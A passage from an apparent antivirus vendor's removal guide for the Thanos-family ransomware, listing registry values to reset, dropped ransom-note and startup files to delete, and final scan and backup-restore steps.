      To: LocalAccountTokenFilterPolicy = "{Default Value}"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    • From: EnableLinkedConnections = "1"
      To: EnableLinkedConnections = "{Default Value}"
  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\FileSystem
    • From: LongPathsEnabled = "1"
      To: LongPathsEnabled = "{Default Value}"

Step 6

Search and delete this file

There may be some files that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.
  • %System%\UserName={Username}_MachineName={Machine Name}_{Volume Serial Number}.txt
  • %User Startup%\mystartup.lnk
  • %User Temp%\RESTORE_FILES_INFO.txt
  • {Encrypted Directory}\RESTORE_FILES_INFO.txt
  • %Desktop%\RESTORE_FILES_INFO.txt
  • %Desktop%\RESTORE_FILES_INFO.hta

Step 7

Restart in normal mode and scan your computer with your Trend Micro product for files detected as Ransom.MSIL.THANOS.FAIM. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.

Step 8

Restore encrypted files from backup.